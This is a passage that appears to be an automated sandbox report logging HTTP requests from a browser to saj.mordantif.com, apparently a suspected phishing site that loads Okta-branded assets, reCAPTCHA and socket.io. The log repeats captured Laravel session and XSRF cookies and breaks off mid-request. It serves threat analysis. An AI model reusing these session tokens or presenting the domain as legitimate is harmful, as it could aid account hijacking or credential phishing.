laravel_session=eyJpdiI6IlE5NUtFUmJoa1g2VmJ5amxYK0dWOXc9PSIsInZhbHVlIjoianU1aDJhQ2twSG5VY21XSVFlbDMvQUNkUnk5MFZpWGdjNnZ1TTNyRHB0VlNQSjA3U09tTFpqMVZHVVNjdm9wSGNLZGRVbUZsREF4ZWdWaUtNdXFUWFRDLzllVUVJLythNHY3TVdUcUN3ekdXakV2d0pKSkViQm1KVW5OYjdQRWEiLCJtYWMiOiIxNzQzMDQwYzFlNjM5ZWZlMGI4NzQwN2NlMGY4Njk1NDliZjdjNWU0OGYzZWNiYWJmZDgyZWQzYzg3ZDQ3MDFlIiwidGFnIjoiIn0%3D
            Source: global trafficHTTP traffic detected: GET /56RePLZ7UZmHT23036MEuv60 HTTP/1.1Host: saj.mordantif.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://saj.mordantif.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://saj.mordantif.com/RTOGZZBDODKFRWTTVU5W0HM2Y143SY2BLP11CI?fygndawgjewqbrrl267129585769599075856O5CEBFHBXCG6YJORF6TAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImdrN0plVFEwV1RCUnFILzFsK29BaGc9PSIsInZhbHVlIjoiOHFGZmQvNEljS2lITTVOUUJJc3FReG9FREt1dWQ5dnBGOFVZMTBMNVJoUnM4ZGcrSXl6TFBwTHozOGlvcXVmaENqYjlPRTZTbDkwUUpEVmx1dGQvSUhVejZwKzdiMDg5V0wwa2JVd21lZkNodTczMGU2SkNMRXNPRk5wcXZtamkiLCJtYWMiOiIyNjE2MzEzM2EyN2JmNzE2MTVmM2Y0MTg0NWZkM2ZhYjdmN2M3M2Y4N2QxY2Q1NTkzZmNkZDI5NDU3OTBiZDE1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlE5NUtFUmJoa1g2VmJ5amxYK0dWOXc9PSIsInZhbHVlIjoianU1aDJhQ2twSG5VY21XSVFlbDMvQUNkUnk5MFZpWGdjNnZ1TTNyRHB0VlNQSjA3U09tTFpqMVZHVVNjdm9wSGNLZGRVbUZsREF4ZWdWaUtNdXFUWFRDLzllVUVJLythNHY3TVdUcUN3ekdXakV2d0pKSkViQm1KVW5OYjdQRWEiLCJtYWMiOiIxNzQzMDQwYzFlNjM5ZWZlMGI4NzQwN2NlMGY4Njk1NDliZjdjNWU0OGYzZWNiYWJmZDgyZWQzYzg3ZDQ3MDFlIiwidGFnIjoiIn0%3D
            Source: global trafficHTTP traffic detected: GET /45itnDnlBkLf89wB5guMvj2hxy65 HTTP/1.1Host: saj.mordantif.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://saj.mordantif.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://saj.mordantif.com/RTOGZZBDODKFRWTTVU5W0HM2Y143SY2BLP11CI?fygndawgjewqbrrl267129585769599075856O5CEBFHBXCG6YJORF6TAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImdrN0plVFEwV1RCUnFILzFsK29BaGc9PSIsInZhbHVlIjoiOHFGZmQvNEljS2lITTVOUUJJc3FReG9FREt1dWQ5dnBGOFVZMTBMNVJoUnM4ZGcrSXl6TFBwTHozOGlvcXVmaENqYjlPRTZTbDkwUUpEVmx1dGQvSUhVejZwKzdiMDg5V0wwa2JVd21lZkNodTczMGU2SkNMRXNPRk5wcXZtamkiLCJtYWMiOiIyNjE2MzEzM2EyN2JmNzE2MTVmM2Y0MTg0NWZkM2ZhYjdmN2M3M2Y4N2QxY2Q1NTkzZmNkZDI5NDU3OTBiZDE1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlE5NUtFUmJoa1g2VmJ5amxYK0dWOXc9PSIsInZhbHVlIjoianU1aDJhQ2twSG5VY21XSVFlbDMvQUNkUnk5MFZpWGdjNnZ1TTNyRHB0VlNQSjA3U09tTFpqMVZHVVNjdm9wSGNLZGRVbUZsREF4ZWdWaUtNdXFUWFRDLzllVUVJLythNHY3TVdUcUN3ekdXakV2d0pKSkViQm1KVW5OYjdQRWEiLCJtYWMiOiIxNzQzMDQwYzFlNjM5ZWZlMGI4NzQwN2NlMGY4Njk1NDliZjdjNWU0OGYzZWNiYWJmZDgyZWQzYzg3ZDQ3MDFlIiwidGFnIjoiIn0%3D
            Source: global trafficHTTP traffic detected: GET /github-production-release-asset-2e65be/2925284/11f3acf8-4ccb-11e6-8ce4-c179c0a212de?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240913%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240913T130616Z&X-Amz-Expires=300&X-Amz-Signature=012060cabb4d90d7bb147ccc7111563bd05e78b595e483f09ff2bc4e80b1baaf&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=2925284&response-content-disposition=attachment%3B%20filename%3Drandexp.min.js&response-content-type=application%2Foctet-stream HTTP/1.1Host: objects.githubusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://saj.mordantif.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /recaptcha/api.js HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=517=WAvHDQo9rXlVA_D7qBDiOgxhmpZ89HJycq3Y9gdpnS5ll8g5WhdhiYfdsaRX3V4ozs4YpMqq2M-92SZoOiJLG4ETue60Fve6SnphdxDx-JP5px97tStsOapKwSO2qkA4Wxb6HozFB1mvk8f4EutNee-LrItYewAmS1eoeaHIrfXyLjr-ZSSe9qJkIitU4oA
            Source: global trafficHTTP traffic detected: GET /4.6.0/socket.io.min.js HTTP/1.1Host: cdn.socket.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /github-production-release-asset-2e65be/2925284/11f3acf8-4ccb-11e6-8ce4-c179c0a212de?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240913%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240913T130616Z&X-Amz-Expires=300&X-Amz-Signature=012060cabb4d90d7bb147ccc7111563bd05e78b595e483f09ff2bc4e80b1baaf&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=2925284&response-content-disposition=attachment%3B%20filename%3Drandexp.min.js&response-content-type=application%2Foctet-stream HTTP/1.1Host: objects.githubusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /90cIpGfk2aMerArq2KIwyO12gL058Oayz79 HTTP/1.1Host: saj.mordantif.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://saj.mordantif.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://saj.mordantif.com/RTOGZZBDODKFRWTTVU5W0HM2Y143SY2BLP11CI?fygndawgjewqbrrl267129585769599075856O5CEBFHBXCG6YJORF6TAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImdrN0plVFEwV1RCUnFILzFsK29BaGc9PSIsInZhbHVlIjoiOHFGZmQvNEljS2lITTVOUUJJc3FReG9FREt1dWQ5dnBGOFVZMTBMNVJoUnM4ZGcrSXl6TFBwTHozOGlvcXVmaENqYjlPRTZTbDkwUUpEVmx1dGQvSUhVejZwKzdiMDg5V0wwa2JVd21lZkNodTczMGU2SkNMRXNPRk5wcXZtamkiLCJtYWMiOiIyNjE2MzEzM2EyN2JmNzE2MTVmM2Y0MTg0NWZkM2ZhYjdmN2M3M2Y4N2QxY2Q1NTkzZmNkZDI5NDU3OTBiZDE1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlE5NUtFUmJoa1g2VmJ5amxYK0dWOXc9PSIsInZhbHVlIjoianU1aDJhQ2twSG5VY21XSVFlbDMvQUNkUnk5MFZpWGdjNnZ1TTNyRHB0VlNQSjA3U09tTFpqMVZHVVNjdm9wSGNLZGRVbUZsREF4ZWdWaUtNdXFUWFRDLzllVUVJLythNHY3TVdUcUN3ekdXakV2d0pKSkViQm1KVW5OYjdQRWEiLCJtYWMiOiIxNzQzMDQwYzFlNjM5ZWZlMGI4NzQwN2NlMGY4Njk1NDliZjdjNWU0OGYzZWNiYWJmZDgyZWQzYzg3ZDQ3MDFlIiwidGFnIjoiIn0%3D
            Source: global trafficHTTP traffic detected: GET /cdwMHwMulA2IdrzZU0QtBhWShA342kvmGDEeGbEkl100 HTTP/1.1Host: saj.mordantif.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://saj.mordantif.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://saj.mordantif.com/RTOGZZBDODKFRWTTVU5W0HM2Y143SY2BLP11CI?fygndawgjewqbrrl267129585769599075856O5CEBFHBXCG6YJORF6TAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImdrN0plVFEwV1RCUnFILzFsK29BaGc9PSIsInZhbHVlIjoiOHFGZmQvNEljS2lITTVOUUJJc3FReG9FREt1dWQ5dnBGOFVZMTBMNVJoUnM4ZGcrSXl6TFBwTHozOGlvcXVmaENqYjlPRTZTbDkwUUpEVmx1dGQvSUhVejZwKzdiMDg5V0wwa2JVd21lZkNodTczMGU2SkNMRXNPRk5wcXZtamkiLCJtYWMiOiIyNjE2MzEzM2EyN2JmNzE2MTVmM2Y0MTg0NWZkM2ZhYjdmN2M3M2Y4N2QxY2Q1NTkzZmNkZDI5NDU3OTBiZDE1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlE5NUtFUmJoa1g2VmJ5amxYK0dWOXc9PSIsInZhbHVlIjoianU1aDJhQ2twSG5VY21XSVFlbDMvQUNkUnk5MFZpWGdjNnZ1TTNyRHB0VlNQSjA3U09tTFpqMVZHVVNjdm9wSGNLZGRVbUZsREF4ZWdWaUtNdXFUWFRDLzllVUVJLythNHY3TVdUcUN3ekdXakV2d0pKSkViQm1KVW5OYjdQRWEiLCJtYWMiOiIxNzQzMDQwYzFlNjM5ZWZlMGI4NzQwN2NlMGY4Njk1NDliZjdjNWU0OGYzZWNiYWJmZDgyZWQzYzg3ZDQ3MDFlIiwidGFnIjoiIn0%3D
            Source: global trafficHTTP traffic detected: GET /347NbeCqp7yhC2mh5YXxi0qmbVijg5xGNhvJ1y5kE67110 HTTP/1.1Host: saj.mordantif.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://saj.mordantif.com/RTOGZZBDODKFRWTTVU5W0HM2Y143SY2BLP11CI?fygndawgjewqbrrl267129585769599075856O5CEBFHBXCG6YJORF6TAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImdrN0plVFEwV1RCUnFILzFsK29BaGc9PSIsInZhbHVlIjoiOHFGZmQvNEljS2lITTVOUUJJc3FReG9FREt1dWQ5dnBGOFVZMTBMNVJoUnM4ZGcrSXl6TFBwTHozOGlvcXVmaENqYjlPRTZTbDkwUUpEVmx1dGQvSUhVejZwKzdiMDg5V0wwa2JVd21lZkNodTczMGU2SkNMRXNPRk5wcXZtamkiLCJtYWMiOiIyNjE2MzEzM2EyN2JmNzE2MTVmM2Y0MTg0NWZkM2ZhYjdmN2M3M2Y4N2QxY2Q1NTkzZmNkZDI5NDU3OTBiZDE1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlE5NUtFUmJoa1g2VmJ5amxYK0dWOXc9PSIsInZhbHVlIjoianU1aDJhQ2twSG5VY21XSVFlbDMvQUNkUnk5MFZpWGdjNnZ1TTNyRHB0VlNQSjA3U09tTFpqMVZHVVNjdm9wSGNLZGRVbUZsREF4ZWdWaUtNdXFUWFRDLzllVUVJLythNHY3TVdUcUN3ekdXakV2d0pKSkViQm1KVW5OYjdQRWEiLCJtYWMiOiIxNzQzMDQwYzFlNjM5ZWZlMGI4NzQwN2NlMGY4Njk1NDliZjdjNWU0OGYzZWNiYWJmZDgyZWQzYzg3ZDQ3MDFlIiwidGFnIjoiIn0%3D
            Source: global trafficHTTP traffic detected: GET /fs/bcg/4/gfsh9pi7jcWKJKMAs1t7 HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://saj.mordantif.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /kl1XjPKHnGhRdwLFWhMa3e96JMl95nsR8rSBiwellijqABwBMDvlTUNJo62aBcHTGWwx220 HTTP/1.1Host: saj.mordantif.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://saj.mordantif.com/RTOGZZBDODKFRWTTVU5W0HM2Y143SY2BLP11CI?fygndawgjewqbrrl267129585769599075856O5CEBFHBXCG6YJORF6TAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImdrN0plVFEwV1RCUnFILzFsK29BaGc9PSIsInZhbHVlIjoiOHFGZmQvNEljS2lITTVOUUJJc3FReG9FREt1dWQ5dnBGOFVZMTBMNVJoUnM4ZGcrSXl6TFBwTHozOGlvcXVmaENqYjlPRTZTbDkwUUpEVmx1dGQvSUhVejZwKzdiMDg5V0wwa2JVd21lZkNodTczMGU2SkNMRXNPRk5wcXZtamkiLCJtYWMiOiIyNjE2MzEzM2EyN2JmNzE2MTVmM2Y0MTg0NWZkM2ZhYjdmN2M3M2Y4N2QxY2Q1NTkzZmNkZDI5NDU3OTBiZDE1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlE5NUtFUmJoa1g2VmJ5amxYK0dWOXc9PSIsInZhbHVlIjoianU1aDJhQ2twSG5VY21XSVFlbDMvQUNkUnk5MFZpWGdjNnZ1TTNyRHB0VlNQSjA3U09tTFpqMVZHVVNjdm9wSGNLZGRVbUZsREF4ZWdWaUtNdXFUWFRDLzllVUVJLythNHY3TVdUcUN3ekdXakV2d0pKSkViQm1KVW5OYjdQRWEiLCJtYWMiOiIxNzQzMDQwYzFlNjM5ZWZlMGI4NzQwN2NlMGY4Njk1NDliZjdjNWU0OGYzZWNiYWJmZDgyZWQzYzg3ZDQ3MDFlIiwidGFnIjoiIn0%3D
            Source: global trafficHTTP traffic detected: GET /ijWVcwkWzgZ9NJntUuz6LBrGkpnmKnWNecHtytLgqr5ZMKNDQLD2TVkGk13JNueykxab223 HTTP/1.1Host: saj.mordantif.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://saj.mordantif.com/RTOGZZBDODKFRWTTVU5W0HM2Y143SY2BLP11CI?fygndawgjewqbrrl267129585769599075856O5CEBFHBXCG6YJORF6TAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImdrN0plVFEwV1RCUnFILzFsK29BaGc9PSIsInZhbHVlIjoiOHFGZmQvNEljS2lITTVOUUJJc3FReG9FREt1dWQ5dnBGOFVZMTBMNVJoUnM4ZGcrSXl6TFBwTHozOGlvcXVmaENqYjlPRTZTbDkwUUpEVmx1dGQvSUhVejZwKzdiMDg5V0wwa2JVd21lZkNodTczMGU2SkNMRXNPRk5wcXZtamkiLCJtYWMiOiIyNjE2MzEzM2EyN2JmNzE2MTVmM2Y0MTg0NWZkM2ZhYjdmN2M3M2Y4N2QxY2Q1NTkzZmNkZDI5NDU3OTBiZDE1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlE5NUtFUmJoa1g2VmJ5amxYK0dWOXc9PSIsInZhbHVlIjoianU1aDJhQ2twSG5VY21XSVFlbDMvQUNkUnk5MFZpWGdjNnZ1TTNyRHB0VlNQSjA3U09tTFpqMVZHVVNjdm9wSGNLZGRVbUZsREF4ZWdWaUtNdXFUWFRDLzllVUVJLythNHY3TVdUcUN3ekdXakV2d0pKSkViQm1KVW5OYjdQRWEiLCJtYWMiOiIxNzQzMDQwYzFlNjM5ZWZlMGI4NzQwN2NlMGY4Njk1NDliZjdjNWU0OGYzZWNiYWJmZDgyZWQzYzg3ZDQ3MDFlIiwidGFnIjoiIn0%3D
            Source: global trafficHTTP traffic detected: GET /fs/bcg/4/gfsh9pi7jcWKJKMAs1t7 HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /jaG38jlE3Csa6VPdagQNh1ZGRwn6zNGNrENQrVC1wpG35UrCP39Qdzk HTTP/1.1Host: saj.mordantif.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InhlRjF0OEtYc3Q5N2Z1OCtXemFaYVE9PSIsInZhbHVlIjoiOUVudzZJN1ZBcHZGREV0VHZQU1FLM3d0TVViRkNpTERMaUdySGNiRnIwUDdoejhQT2hwS250eEV0VGs4MHNsak5nbjF1SmdXOHhXSVlqdUpqMmtjbUM3N21XQ2EvYXB3TnJ1THZEeTdFc0Z6N2M4TFcxYkM3RUhHTmE2Ym9zVFkiLCJtYWMiOiIwMDIwMzBiYTc4YWQzZTA2OWE0NTgzMjk1NDJkMjVhNWVkN2M0ZjlmMDVkNGIyYjk2MDhjY2VkYTRkM2Q2ODhjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InlkanJBa2VXSWdiTER3ZFQ1dXBqUEE9PSIsInZhbHVlIjoiYkt6MU1TSm1yMzROakJlNGsyV3UvVkZiMkdvem12c0F0OGhDMXNlUFBwTmV1L2RxREpFZVArQnc5eVhDUEtJWVVPZ3JDb2N2TFJLY0I2Q2cyTjBULzVnRWRBUEM5RytBN1V6ZFlhUWs0UnF4ZHA4MFp1KzZCNEs5cjczQVZxd3EiLCJtYWMiOiJiNzYyNDY3Yjg3MTNjNDYyODk3M2FlNjRmM2FmZDk4YTlkYTE1NWZiMjI1N2ZkZGViM2M3MTI3NjEwMzVmODliIiwidGFnIjoiIn0%3D
            Source: global trafficHTTP traffic detected: GET /kl1XjPKHnGhRdwLFWhMa3e96JMl95nsR8rSBiwellijqABwBMDvlTUNJo62aBcHTGWwx220 HTTP/1.1Host: saj.mordantif.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InhlRjF0OEtYc3Q5N2Z1OCtXemFaYVE9PSIsInZhbHVlIjoiOUVudzZJN1ZBcHZGREV0VHZQU1FLM3d0TVViRkNpTERMaUdySGNiRnIwUDdoejhQT2hwS250eEV0VGs4MHNsak5nbjF1SmdXOHhXSVlqdUpqMmtjbUM3N21XQ2EvYXB3TnJ1THZEeTdFc0Z6N2M4TFcxYkM3RUhHTmE2Ym9zVFkiLCJtYWMiOiIwMDIwMzBiYTc4YWQzZTA2OWE0NTgzMjk1NDJkMjVhNWVkN2M0ZjlmMDVkNGIyYjk2MDhjY2VkYTRkM2Q2ODhjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InlkanJBa2VXSWdiTER3ZFQ1dXBqUEE9PSIsInZhbHVlIjoiYkt6MU1TSm1yMzROakJlNGsyV3UvVkZiMkdvem12c0F0OGhDMXNlUFBwTmV1L2RxREpFZVArQnc5eVhDUEtJWVVPZ3JDb2N2TFJLY0I2Q2cyTjBULzVnRWRBUEM5RytBN1V6ZFlhUWs0UnF4ZHA4MFp1KzZCNEs5cjczQVZxd3EiLCJtYWMiOiJiNzYyNDY3Yjg3MTNjNDYyODk3M2FlNjRmM2FmZDk4YTlkYTE1NWZiMjI1N2ZkZGViM2M3MTI3NjEwMzVmODliIiwidGFnIjoiIn0%3D
            Source: global trafficHTTP traffic detected: GET /ijWVcwkWzgZ9NJntUuz6LBrGkpnmKnWNecHtytLgqr5ZMKNDQLD2TVkGk13JNueykxab223 HTTP/1.1Host: saj.mordantif.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InhlRjF0OEtYc3Q5N2Z1OCtXemFaYVE9PSIsInZhbHVlIjoiOUVudzZJN1ZBcHZGREV0VHZQU1FLM3d0TVViRkNpTERMaUdySGNiRnIwUDdoejhQT2hwS250eEV0VGs4MHNsak5nbjF1SmdXOHhXSVlqdUpqMmtjbUM3N21XQ2EvYXB3TnJ1THZEeTdFc0Z6N2M4TFcxYkM3RUhHTmE2Ym9zVFkiLCJtYWMiOiIwMDIwMzBiYTc4YWQzZTA2OWE0NTgzMjk1NDJkMjVhNWVkN2M0ZjlmMDVkNGIyYjk2MDhjY2VkYTRkM2Q2ODhjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InlkanJBa2VXSWdiTER3ZFQ1dXBqUEE9PSIsInZhbHVlIjoiYkt6MU1TSm1yMzROakJlNGsyV3UvVkZiMkdvem12c0F0OGhDMXNlUFBwTmV1L2RxREpFZVArQnc5eVhDUEtJWVVPZ3JDb2N2TFJLY0I2Q2cyTjBULzVnRWRBUEM5RytBN1V6ZFlhUWs0UnF4ZHA4MFp1KzZCNEs5cjczQVZxd3EiLCJtYWMiOiJiNzYyNDY3Yjg3MTNjNDYyODk3M2FlNjRmM2FmZDk4YTlkYTE1NWZiMjI1N2ZkZGViM2M3MTI3NjEwMzVmODliIiwidGFnIjoiIn0%3D
            Source: global trafficHTTP traffic detected: GET /347NbeCqp7yhC2mh5YXxi0qmbVijg5xGNhvJ1y5kE67110 HTTP/1.1Host: saj.mordantif.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InhlRjF0OEtYc3Q5N2Z1OCtXemFaYVE9PSIsInZhbHVlIjoiOUVudzZJN1ZBcHZGREV0VHZQU1FLM3d0TVViRkNpTERMaUdySGNiRnIwUDdoejhQT2hwS250eEV0VGs4MHNsak5nbjF1SmdXOHhXSVlqdUpqMmtjbUM3N21XQ2EvYXB3TnJ1THZEeTdFc0Z6N2M4TFcxYkM3RUhHTmE2Ym9zVFkiLCJtYWMiOiIwMDIwMzBiYTc4YWQzZTA2OWE0NTgzMjk1NDJkMjVhNWVkN2M0ZjlmMDVkNGIyYjk2MDhjY2VkYTRkM2Q2ODhjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InlkanJBa2VXSWdiTER3ZFQ1dXBqUEE9PSIsInZhbHVlIjoiYkt6MU1TSm1yMzROakJlNGsyV3UvVkZiMkdvem12c0F0OGhDMXNlUFBwTmV1L2RxREpFZVArQnc5eVhDUEtJWVVPZ3JDb2N2TFJLY0I2Q2cyTjBULzVnRWRBUEM5RytBN1V6ZFlhUWs0UnF4ZHA4MFp1KzZCNEs5cjczQVZxd3EiLCJtYWMiOiJiNzYyNDY3Yjg3MTNjNDYyODk3M2FlNjRmM2FmZDk4YTlkYTE1NWZiMjI1N2ZkZGViM2M3MTI3NjEwMzVmODliIiwidGFnIjoiIn0%3D
            Source: global trafficHTTP traffic detected: GET /uvtOweyyjyKYQ0krMEjD3S65UkP8fHqrZofTHOSWLmnqO12130 HTTP/1.1Host: saj.mordantif.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: 